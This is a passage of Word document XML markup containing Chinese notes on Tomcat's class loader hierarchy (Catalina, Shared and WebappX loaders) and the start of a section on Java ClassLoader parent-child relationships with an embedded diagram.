        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4.Catalina</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类加载器从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>server/classes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>server/lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下加载类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,Catalina</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加载的类只对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务器内核可见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用程序不可见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内核的线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>它的上下文类加载器就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Catalina</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类加载器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5.Shared</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类加载器负责从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>share/classes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>share/lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中加载类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>它加载的类只对所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用程序有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6.WebappX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类加载器负责加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用程序的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/web-INF/classes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>目录下的类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>只对当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用程序有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用程序无效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于运行每个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用程序的线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>他们的上下文类加载器就是它们各自的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WebappX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类加载器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD1E4B" w:rsidRDefault="00A84035" w:rsidP="00884D5D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从以上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点可以看出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提供了完整的类加载器体系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并且分工非常的明确</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因而非常访问我们进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用程序的设置和部署</w:t>
      </w:r>
      <w:r w:rsidR="00C10394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221F39" w:rsidRPr="00221F39" w:rsidRDefault="00221F39" w:rsidP="00221F39">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00BD4852">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语言中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是以父子关系存在的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本身也有一定的类加载规范。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中基本的</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>层级关系如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221F39" w:rsidRDefault="00221F39" w:rsidP="00221F39">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4279265" cy="3379470"/>
            <wp:effectExtent l="19050" t="0" r="6985" b="0"/>
            <wp:docPr id="224" name="图片 3" descr="http://dl.iteye.com/upload/attachment/0074/2251/118eb6d8-58d8-309b-87f0-50c6f6768d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dl.iteye.com/upload/attachment/0074/2251/118eb6d8-58d8-309b-87f0-50c6f6768de3.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4279265" cy="3379470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
